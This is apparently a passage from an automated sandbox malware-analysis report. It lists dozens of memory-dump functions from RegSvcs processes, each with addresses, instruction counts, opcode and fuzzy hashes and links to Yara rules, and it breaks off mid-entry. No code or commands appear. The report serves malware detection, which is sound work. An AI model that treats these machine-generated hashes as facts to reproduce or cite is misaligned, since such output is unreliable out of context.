Opcode ID: 455f087eac761d134eec9653d3d1f02f36cbb01b43ed097272621165c947b377
Instruction ID: 6dcc7256ae791af711279f1ddae60c2ab024c472eb04ad62883283a620bdbde7
Opcode Fuzzy Hash: 455f087eac761d134eec9653d3d1f02f36cbb01b43ed097272621165c947b377
Instruction Fuzzy Hash: F301F172B001102BCB65973DB81176AF7DBCFDAA20F14883AE109CB394EEA5DD424396

Function 06D420DB Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1980998316.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6d40000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ae87aa6cd6e00d3b2abc733ecf8910d1bc28e7a2e1545e54b3e752eb7fced189
Instruction ID: 6162f08cdce79460dee5c85fbc0bcc93eea0633907d121d5f583aef7e46e7a1e
Opcode Fuzzy Hash: ae87aa6cd6e00d3b2abc733ecf8910d1bc28e7a2e1545e54b3e752eb7fced189
Instruction Fuzzy Hash: 1001DE31B005015BDB65A66DA895B2BB7CADBC9720F20843EFA0ECB340DE26CD4383D5

Function 06D445DB Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1980998316.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6d40000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 33d6ccee26512fbf923ec72db6f3e9aa7efd7f0f836d83cc1fb86409843b0f8b
Instruction ID: 3ef6e446fbd8334f9618aaf16a9ac79d327a7028c8b4ec9e1af8db1ea60d02ce
Opcode Fuzzy Hash: 33d6ccee26512fbf923ec72db6f3e9aa7efd7f0f836d83cc1fb86409843b0f8b
Instruction Fuzzy Hash: 03212570E001288BDB64DFA9D954BEDBBB2AF88300F2480AAD455B7351DB710D84DF90

Function 06D1D850 Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1980543244.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6d10000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a13a6f1906ce6a6c1a77d5091cb815c45fc593abe54e47ea26adb93bc39f8920
Instruction ID: 530564a3ac4b494955122787de96573ac7995e57f17fa3b577f8b3ce9fe02cc5
Opcode Fuzzy Hash: a13a6f1906ce6a6c1a77d5091cb815c45fc593abe54e47ea26adb93bc39f8920
Instruction Fuzzy Hash: 59115E35F10129AFDB549679E8246AE73EBEBC8710B10453AD40AEB354EFA5DC028BD1

Function 06D445E0 Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1980998316.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6d40000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ab2d36243c8314296abb645a4b97e9b077d86961dd499cc0bc586d07fe19855b
Instruction ID: 859e206d35c423af976c6205f570dc4a4ae6218c2a720d45e33f66c78bb31f37
Opcode Fuzzy Hash: ab2d36243c8314296abb645a4b97e9b077d86961dd499cc0bc586d07fe19855b
Instruction Fuzzy Hash: ED212570E002288BDB64EFA9D954BEDBBF2AF88300F1480AAD855B7355DB715D84DF90

Function 06D4A138 Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1980998316.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6d40000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5e8836916c361c4665692bf8495abbe5c8fc1182d9f4a9a3aceb3ad62d1795fe
Instruction ID: e1cead5134f295310e4ba6e7e466ad2133f66ef9a75fd988b142a80db8d5e2f2
Opcode Fuzzy Hash: 5e8836916c361c4665692bf8495abbe5c8fc1182d9f4a9a3aceb3ad62d1795fe
Instruction Fuzzy Hash: 5B21F731E00618CFDB58DFA9D949ADDBBF1BF8C311F14806AD405B7264DB359984CB60

Function 0266D50F Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1946752406.000000000266D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0266D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_266d000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
Instruction ID: be8f3a11c674b31d6a1c94845de5aa1ed837cf26df0a2b192769577f2f3b6db5
Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
Instruction Fuzzy Hash: 7611D376504280CFCB16CF14D5C4B26BF72FB84318F24C5A9D8094B756C336D45ACBA1

Function 0267D1CF Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1947423889.000000000267D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0267D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_267d000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
Instruction ID: 865603e65432483dcfaff89f27c5e22f5714d88c915ab92681fdb112c7e04c25
Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
Instruction Fuzzy Hash: 2511BB75504280DFCB02CF10D5C4B15BFA1FF84218F28CAAADD494B396C33AD40ACB61

Function 06D1D83F Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1980543244.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6d10000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 956a7f921dfb753d4e3abccba94f1ad69ed17a4c90785516fe628e620f631316
Instruction ID: 1bc20007d50b4df4d29787910167de0630750ef886f12ef03354af3d626ef12c
Opcode Fuzzy Hash: 956a7f921dfb753d4e3abccba94f1ad69ed17a4c90785516fe628e620f631316
Instruction Fuzzy Hash: 2E018F36F10028ABDB549669AC216EF76ABDBC8210F00413AD40ADB244EEA0D80287D2

Function 0267D77F Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1947423889.000000000267D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0267D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_267d000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e676ac0fa395c9d78ad1373b251d500d35a058fc48d93c8ca3093ca1b2890539
Instruction ID: 71c41da62c781f66ab5d3b77d44913a986491a926f4d3c517b6d2f48245d8d0a
Opcode Fuzzy Hash: e676ac0fa395c9d78ad1373b251d500d35a058fc48d93c8ca3093ca1b2890539
Instruction Fuzzy Hash: 86118B75904280CFDB16CF14D5C4B15BFA1FB84618F28CAAED84A4B756C33AD44ACB51

Function 0267D687 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1947423889.000000000267D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0267D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_267d000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e676ac0fa395c9d78ad1373b251d500d35a058fc48d93c8ca3093ca1b2890539
Instruction ID: dc63ab8af0e5a2daa6d29394564a6912ddb913441fbc4edd29778b4360654ae4
Opcode Fuzzy Hash: e676ac0fa395c9d78ad1373b251d500d35a058fc48d93c8ca3093ca1b2890539
Instruction Fuzzy Hash: 22116D79504280DFDB15CF24E5C4B15BFA1FB84318F24CAAED8494B766C33AD44ACB92

Function 06D4E011 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1980998316.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6d40000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1f153c5c489f6733c560e4dd9f54db3bcdd884cdf8a732cdcabc32fd48e344da
Instruction ID: a659a27cce34e76d7cddacd8207a337bd7df9fe5fc827231b5a4abe6888d1b17
Opcode Fuzzy Hash: 1f153c5c489f6733c560e4dd9f54db3bcdd884cdf8a732cdcabc32fd48e344da
Instruction Fuzzy Hash: D7117035A012069FCB51DFA9D8408ABFBF2FF89220704866AE95597312C731ED55CF90

Function 06D14A50 Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1980543244.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6d10000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: db2103a4c74f02eb097189de3ad3c32dedb401a5d3d70bca724418437d427eaf
Instruction ID: 79c31e954d2f4f5722327c0aafb5c729e332aa06bb96f415e6eeda85f4709eb4
Opcode Fuzzy Hash: db2103a4c74f02eb097189de3ad3c32dedb401a5d3d70bca724418437d427eaf
Instruction Fuzzy Hash: 2201D430B111126FCB60EB2CE464B2A77D9EB89718F108439E50ECB344EE65EC0387D9

Function 06D4DF70 Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1980998316.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6d40000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6dceb5bf926f3429d981a20d4f22290036ec03d1487575428f55c52edc83538d
Instruction ID: d34f74c50f4e9248d9624d05e4ada466c3747ac01059fd2a7e291fe2cf7c3088
Opcode Fuzzy Hash: 6dceb5bf926f3429d981a20d4f22290036ec03d1487575428f55c52edc83538d
Instruction Fuzzy Hash: 0A11A171A002698FDB24DFA8C944AEDBBF5BF48714F1401AAE442E7361DB749D44CBA0

Function 06D420E0 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1980998316.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6d40000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf62ad99a07afff25c93ab50d1d4f70194ea7689f1b24c8aac4cc98f6304c00c
Instruction ID: a61380e94cda8c5cab80ffdeefff8050537c87ed134ff9ce4844a6d686bad485
Opcode Fuzzy Hash: bf62ad99a07afff25c93ab50d1d4f70194ea7689f1b24c8aac4cc98f6304c00c
Instruction Fuzzy Hash: 0601AF71B005125BDB64A66D9895B2FB3DADBCAB20F10883EFA0EC7340DE26DD434795

Function 06D4602D Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1980998316.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6d40000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d9e6d968b91d96649da30896d90c177581e0a7612ec684fc6a0fd29a39930217
Instruction ID: 94b2f52e215136a4c7ec7bfa1a3922f10fafa5e39c00edb93ac6adf09ad99946
Opcode Fuzzy Hash: d9e6d968b91d96649da30896d90c177581e0a7612ec684fc6a0fd29a39930217
Instruction Fuzzy Hash: E9116171605B80CFC366CF29D840997BFF1AF993107054A6FE08ACBA72D671E849CB91

Function 06D451A3 Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1980998316.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6d40000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dfdd062f80ef415c7232053763849afe7d678e329c1b3213a0ae84456fcb1f9f
Instruction ID: 4375ec671c3984a2a73d52ac354ec287caaa094ee4a1f204112fede40efb7376
Opcode Fuzzy Hash: dfdd062f80ef415c7232053763849afe7d678e329c1b3213a0ae84456fcb1f9f
Instruction Fuzzy Hash: 541144B5A10615DFCB04DF78D9448AEBBF5FF897117100569E905E7320D730A955CBA0

Function 06D451A8 Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1980998316.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6d40000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bcd72f60200a93f706221bd890940d0d1522bb75df00072ecbd68ed3ca9aaa13
Instruction ID: 1b1d0a339d987f3c0afefca2a16f6b70547817f199f7f13d1a36fea5b45cff2a
Opcode Fuzzy Hash: bcd72f60200a93f706221bd890940d0d1522bb75df00072ecbd68ed3ca9aaa13
Instruction Fuzzy Hash: 0E014475A106059FCB04DF78D844CAEBBF9FF89310B100569E905D7320D770AD44CBA0

Function 06D14A60 Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1980543244.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6d10000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 35de51377fbf5155b2998deb85869246af021fb55fe2098e7bb0bd122be93180
Instruction ID: c0295a7ff74c1a2777d17b7ae1a10fbe9c2d080a8b490d1e229ebf26343db4bc
Opcode Fuzzy Hash: 35de51377fbf5155b2998deb85869246af021fb55fe2098e7bb0bd122be93180
Instruction Fuzzy Hash: 05016D30B111152FCB64AB2CE455B2A73DAEB89728F108439E50ECB344DE65DC0287C9

Function 06D4675F Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1980998316.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6d40000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3c6ba072ef231aba378333d7c32b825d5c5e194b2229c6af2cbf2ac2785f6f68
Instruction ID: 0443196de6815fdb67ce5a1330de64eb28a2fa3dc63193983561d97f9eb5b54a
Opcode Fuzzy Hash: 3c6ba072ef231aba378333d7c32b825d5c5e194b2229c6af2cbf2ac2785f6f68
Instruction Fuzzy Hash: 52F046723093505FC3066729AC2499ABBA5CFC6715B0942BBF20ACBA61D938CC06C7B5

Function 0266DB01 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1946752406.000000000266D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0266D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_266d000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2a87a365e87c759b0a814c8f4dfdb641f4952c54ddbb636d2f9de902968b1b0c
Instruction ID: 006f9b5c59adf931c242af6af2c3493c207550bd22d0800954add87419cd2540
Opcode Fuzzy Hash: 2a87a365e87c759b0a814c8f4dfdb641f4952c54ddbb636d2f9de902968b1b0c
Instruction Fuzzy Hash: 400126B12083419AE7108E2ACD88B77FFD8EF40764F08C42AEC084B38AC378D840C6B1

Function 06D4D317 Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1980998316.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6d40000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7b985cb91adc40d1426b4135d7c59469ff377ba53a2c915abbbf3d324abf7998
Instruction ID: ce62969b2c8a213457cd6f656337356bfd6e1cb91f9aac575335f7c27a0adf15
Opcode Fuzzy Hash: 7b985cb91adc40d1426b4135d7c59469ff377ba53a2c915abbbf3d324abf7998
Instruction Fuzzy Hash: C9014F312402005FC355EB28D94459AFBA7EFC6750B448A79D04A4F724DF72ED5E8BD4

Function 06D1ACF8 Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1980543244.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6d10000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dcff89fc7a39ee4f58672ecace4ae5d5103f6f9f623b4330e953dce418b3877f
Instruction ID: b7f904f5e3fbc8ebc40e4be34fe716706779d6f4c85d9e891cdc9b8412b78bae
Opcode Fuzzy Hash: dcff89fc7a39ee4f58672ecace4ae5d5103f6f9f623b4330e953dce418b3877f
Instruction Fuzzy Hash: 9EF0A777E1122957EB205A68E8415CBF76AEB85774F10053BD90AE7200E962990686D1

Function 0266D87F Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1946752406.000000000266D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0266D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_266d000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 88d065f69b9fade92ff2314cdb85f6b013970cae34f70ac11a82bb78df230a2b
Instruction ID: 9ba19dae38ae37ce3b6c6b1df4a2e6086a97ac1a80b6c3adf3bae84b93640e63
Opcode Fuzzy Hash: 88d065f69b9fade92ff2314cdb85f6b013970cae34f70ac11a82bb78df230a2b
Instruction Fuzzy Hash: E4F01D76200600AF97209F06D984C23FBA9FFC4730719C55EE84A4B652C671F851CFA0

Function 06D44EE3 Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1980998316.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6d40000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a245deb7b5d4aadb0160b23c6d6a27433241c027d265f1bc82d9264c64c2bcb2
Instruction ID: d297dc6f6eb7bae219a47d59237c629da7b991189cdfd79fa8540b45b1cbe7f5
Opcode Fuzzy Hash: a245deb7b5d4aadb0160b23c6d6a27433241c027d265f1bc82d9264c64c2bcb2
Instruction Fuzzy Hash: 32F05932B127124BD7112AB555943BA7BD9EFC0111B54013AE406D2240EF74C88DD690

Function 06D467D8 Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1980998316.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6d40000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c6114213570874e5c2beec46ed862e6c9366461727747152693b1956411f25a8
Instruction ID: 5462ec540adc258631b2c2a099020e2343cd858c25efa3126359c92ef74726ee
Opcode Fuzzy Hash: c6114213570874e5c2beec46ed862e6c9366461727747152693b1956411f25a8
Instruction Fuzzy Hash: 1301D4B0E44289AFDB80FF68C91936D7BB1EB02308F008599C01297BC5CF78C904CB81

Function 06D49A0B Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1980998316.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6d40000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2185c07f05b75c3ce2949d768248068aa125824263f41d8bd1076711530dc51c
Instruction ID: c420a77890588cf7a6acaa644e56a76e5b5fe0d34fbe30b102fce377ab1fea1e
Opcode Fuzzy Hash: 2185c07f05b75c3ce2949d768248068aa125824263f41d8bd1076711530dc51c
Instruction Fuzzy Hash: 52F02471B246159F8B51EE6AD892CAF3BECEF85221704411AF8498B200DB20DD1197E1

Function 06D433B8 Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1980998316.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6d40000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7f1770533ddb85ccc9f6f090bdb282d51b1913150511e450d017f90abe3d8024
Instruction ID: 7ca9992783cb0cf53b308f39b948c47f4bcc78ad6eff1079f5c608c61e684b9f
Opcode Fuzzy Hash: 7f1770533ddb85ccc9f6f090bdb282d51b1913150511e450d017f90abe3d8024
Instruction Fuzzy Hash: 29F082327093506FD315DA6E9884E93BBACEF95661716806BF008D7271D661EC11C7A1

Function 06D4D30D Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1980998316.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6d40000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c5df3b13890e21bc978c9ebffca0a1963d4691da6cfaa487730bf99f4a21717b
Instruction ID: b582ddb65849342bae2c009fd548f45dae986518eae60775a1a7158fcd48881c
Opcode Fuzzy Hash: c5df3b13890e21bc978c9ebffca0a1963d4691da6cfaa487730bf99f4a21717b
Instruction Fuzzy Hash: 06F06435B00210CFDB55EBA8E848AAC73B2EF88225B1401A8E5069B360DF34DD45CBA0

Function 0266D870 Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1946752406.000000000266D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0266D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_266d000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 289b9d9610fe4a3549e35334c764a699705d5fca313f194e20f8d38397cb13ae
Instruction ID: 724f09012f8ab4368e585a506337c133aea23931fddccdc442bbe9f493b07adb
Opcode Fuzzy Hash: 289b9d9610fe4a3549e35334c764a699705d5fca313f194e20f8d38397cb13ae
Instruction Fuzzy Hash: A9011D75104780AFD7258F15C994C23BFBAFF89760719858DE8864B762C631FC02CB60

Function 06D45263 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1980998316.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6d40000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 52b1a1dc3ad21764ef8d829aed5ad93a91c51c3744734508d871db661d72849d
Instruction ID: a32dad1e780cef07778d6f5dfbc593db069acdb3d1b0d153cb82120c58539b06
Opcode Fuzzy Hash: 52b1a1dc3ad21764ef8d829aed5ad93a91c51c3744734508d871db661d72849d
Instruction Fuzzy Hash: C9016D3690010ADFCB00DF94C905DDEBBB5EF48310B1041A5E614EB170D7319A19CF90

Function 0266DB00 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1946752406.000000000266D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0266D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_266d000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5d8573443ec27861b9f98ce6eedd92911792b70c0734e1389fd724ba91d90464
Instruction ID: 7048c25ab9d2911872d740351a30355d01fc724fac79de1fbbfcda22c51cf442
Opcode Fuzzy Hash: 5d8573443ec27861b9f98ce6eedd92911792b70c0734e1389fd724ba91d90464
Instruction Fuzzy Hash: 45F06DB1508344AAE7108A1AD988B66FFA8EF45774F18C45AED085F296C379A844CAB1

Function 06D45268 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1980998316.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6d40000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ba9d656d103441d88e3be9a324b6f791773006ca73cbc0ef2e9a46a56f67c386
Instruction ID: c662ef7479c4628960f30db888e7864d0189e2a457fb57a688958546cee501d8
Opcode Fuzzy Hash: ba9d656d103441d88e3be9a324b6f791773006ca73cbc0ef2e9a46a56f67c386
Instruction Fuzzy Hash: F4F03C3690010AEFCF00DFA8D904CDEBBB6EF49310B1041A5E618EB270E731AA15CB91

Function 06D49B13 Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1980998316.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6d40000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2837b0d00f143bc0b91a7d7c37d1f89e95529296a289e47b843b40c0007cd20c
Instruction ID: 7a39f5b33a9891c841c9666003535c0bd1ce23e279ac5c0235084bda95c9ac50
Opcode Fuzzy Hash: 2837b0d00f143bc0b91a7d7c37d1f89e95529296a289e47b843b40c0007cd20c
Instruction Fuzzy Hash: E401F6B5D0020AEFCB40EFA8C9519AEBFB4EF48200F108666E549A7210E7309A518FD1

Function 06D46048 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1980998316.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6d40000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5997dcd3e12c16899d9289f47202da95ac1a164444aa67915453b9406ba2a3cf
Instruction ID: fc513c25c19518207fbc22ade60bf7bc19265cce8f3107e217d13e9191d20ae6
Opcode Fuzzy Hash: 5997dcd3e12c16899d9289f47202da95ac1a164444aa67915453b9406ba2a3cf
Instruction Fuzzy Hash: 29F0A471640B049FC324DF2AD944946FBF5EF98310B008A2AE44A87775EA71E8498B90

Function 06D49B18 Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1980998316.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6d40000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9f0d1ce452e83206ad147bcf51a84fb34a52f65ecbeed82c5146e57c62a261b6
Instruction ID: 8a6c44fcaf6885fe3456350b7d4214603e187e87a17c71cdcf2a944f4fe736ab
Opcode Fuzzy Hash: 9f0d1ce452e83206ad147bcf51a84fb34a52f65ecbeed82c5146e57c62a261b6
Instruction Fuzzy Hash: C5F0ECB0D0020ADFCB40EFA9C9559AE7FB4EF48300F108656E555E7250E7709A55CFD1

Function 06D475AB Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1980998316.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6d40000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4bf398737a6efd0ad62c3f41607076f8a3dd177091e0e69d3f4b0666ca8c6286
Instruction ID: 97ae39e754e0c82d09365581139d2c44860b9aa02b33ee617b3ca947f2419e5c
Opcode Fuzzy Hash: 4bf398737a6efd0ad62c3f41607076f8a3dd177091e0e69d3f4b0666ca8c6286
Instruction Fuzzy Hash: 0BE092317052209FC305176ED81485ABFAEAFC96213154097F405C3332DE658C0687E1

Function 06D4A09B Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1980998316.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6d40000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6e1e9c205e27bc739518a3f08e11d8ae0620e7c2ccafaf37e48b6c83d0fbd483
Instruction ID: 4ff343c67632324cddc9c2089169947086879bd405c69acb5a235e9aa93e64c6
Opcode Fuzzy Hash: 6e1e9c205e27bc739518a3f08e11d8ae0620e7c2ccafaf37e48b6c83d0fbd483
